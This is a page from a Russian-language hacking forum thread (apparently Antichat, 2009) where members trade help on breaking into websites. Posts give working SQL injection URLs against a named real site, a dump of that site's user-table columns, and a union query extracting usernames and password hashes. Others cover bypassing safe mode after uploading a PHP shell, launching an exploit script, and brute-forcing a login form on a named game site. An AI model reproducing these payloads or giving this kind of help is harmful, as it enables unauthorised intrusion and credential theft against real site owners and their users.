Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 457 of 1207
  1. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196

    на венде нет чмодов, поэтому и не ставит. А файлы редактировать не можешь, потмоу что прав нет. В настройках IIS можно так настраивать.
     
    #9121 попугай, 4 Oct 2009
    1 person likes this.
  2. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    уже лучше,а где если не сикрет включить/отключить?
     
    #9122 Shadrin, 4 Oct 2009
  3. Gray_Wolf

    Gray_Wolf Active Member

    Joined:
    7 Mar 2009
    Messages:
    377
    Likes Received:
    135
    Reputations:
    10
    В настройках учётных записей, хотя боюсь в винде это будет сделать не просто...
     
    #9123 Gray_Wolf, 4 Oct 2009
    2 people like this.
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196

    Наверное в конфигах IIS - но прав у тебя нет наверняка для этого.

    ЗЫ. в какой доменной зоне сайт?)
     
    #9124 попугай, 4 Oct 2009
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Shadrin, существуют простые аплодеры которые работают средствами mysql, через into outfile
     
    #9125 Spyder, 4 Oct 2009
  6. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    введи у себя на винде в цмд и почитай:
    Может и прокатит на твоем шелле,хотя и маловероятно.
     
    #9126 $n@ke, 4 Oct 2009
  7. mak-shapova

    mak-shapova New Member

    Joined:
    11 Jan 2009
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    хелп плиз.
    есть доступ к админке, можно заливать файлы на сервер, залил php shell, но на сервере Safe-mode ON. даже листинг файлов сделать нельзя.
    Скажите что нужно прописать в .htaccess, чтобы в папке(не cgi-bin) исполнялись perl скрипты?
     
    #9127 mak-shapova, 4 Oct 2009
  8. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    чти
     
    #9128 $n@ke, 4 Oct 2009
  9. nitr00

    nitr00 New Member

    Joined:
    2 Sep 2009
    Messages:
    80
    Likes Received:
    4
    Reputations:
    0
    ребят всем доброго времени суток
    подскажите пожалуйста я установил xampp запустил цмд прописал путь :
    c:\xampp\php\php.exe
    далее начал прописывать путь к сплойту и нечего не происходит
    даже если написать после хампа всякую чушь вроде dsdhsds тоже не реагирует
    просьба за символичискую плату помоч =)) если ошибся разделом извиняйте
     
    #9129 nitr00, 4 Oct 2009
  10. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    создай .bat файл в нем пропиши


    CD\
    cmd /k xampp\php\php.exe C:\sploitipb\1.php .. .. ...

    ..- какие функции у тебя там для сплоита
     
    _________________________
    #9130 HAXTA4OK, 4 Oct 2009
    2 people like this.
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Не функции, а аргументы )
     
    #9131 mailbrush, 4 Oct 2009
    1 person likes this.
  12. Kreoda

    Kreoda New Member

    Joined:
    9 Sep 2009
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Всем привет.Нашёл инжект в Microsoft JET Dabatase.Узнал пару тройку имён таблиц.Количество полей подобрал.После подстановки реальной таблицы выдаётся ошибка:

    Syntax error in FROM clause.

    Как это объяснить и как выдрать информацию ?

    Запрос вышел что-то вроде parameter+union+select+1,2,3+FROM+realtable
     
    #9132 Kreoda, 4 Oct 2009
  13. Torentte

    Torentte New Member

    Joined:
    3 Oct 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Всем привет)Помогите подобрать имя таблицы, много вариантов перепробовал, но все без успешны...
    http://gazanalyzator.ru/?id=70+union+select+1,2/*
    Заранее спасибо)
     
    #9133 Torentte, 4 Oct 2009
  14. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    _ttp://gazanalyzator.ru/?id=-70+union+select+version()+from+news/* :)
     
    #9134 DrAssault, 5 Oct 2009
    Last edited: 5 Oct 2009
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    =============================
gazanalyzator.ru
89.104.81.227
=============================
4.1.22-standard
-------
-------
Найденные таблицы:
-------
itaf_user
news
vote_results
-------
=============================
Найденные колонки из таблицы itaf_user:
-------
id
user_name
user_pass
user_mail
=============================


http://gazanalyzator.ru/?id=70+union+select+1,concat_ws(0x3a,user_name,user_pass)+from+itaf_user/*
     
    #9135 Pashkela, 5 Oct 2009
    Last edited: 5 Oct 2009
    1 person likes this.
  16. XXXXXX

    XXXXXX New Member

    Joined:
    3 Jun 2009
    Messages:
    24
    Likes Received:
    1
    Reputations:
    -5
    Привет всем. думаю все знают прагу brutus-aet2. В инете милион статей как с помощью этой праги угнать мыло и фтп, а вот как этой прагой подобрать пасс зная логин к сайту(тоесть к форме) немогу понять. вроде как то получилось так прага вылает левые пароли. кому не трудно обьесните пожалуйста. пытался подобрать пасс к сайту http://www.voyna-plemyon.ru/
     
    #9136 XXXXXX, 5 Oct 2009
    1 person likes this.
  17. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    http://forum.antichat.ru/thread109600.html
    Эту попробуй
     
    #9137 SeNaP, 5 Oct 2009
    2 people like this.
  18. XXXXXX

    XXXXXX New Member

    Joined:
    3 Jun 2009
    Messages:
    24
    Likes Received:
    1
    Reputations:
    -5
    Возможностей много но прага сырая. :mad:
    Обьясни как брудить форму прагой brutus-aet2. :confused:
     
    #9138 XXXXXX, 5 Oct 2009
  19. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,163
    Likes Received:
    617
    Reputations:
    690
    Прога не сырая а универсальная, как раз формы норм брутит....
     
    _________________________
    #9139 shell_c0de, 6 Oct 2009
  20. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    И так
    Твой запрос приводит к ошибке.
    Error pulling cat information from database: (SELECT cat_na as cat, maincat FROM cfaq_cats WHERE catid = 24) Unknown column 'cat_na' in 'field list'
    Т.е. intval() нету, что неплохо.
    Зато просто ограничение в 2 символа :)
    Если хочешь, крути скулю в лимит 2 символа ;)
     
    #9140 Ctacok, 6 Oct 2009
    1 person likes this.
(You must log in or sign up to post here.)
Page 457 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.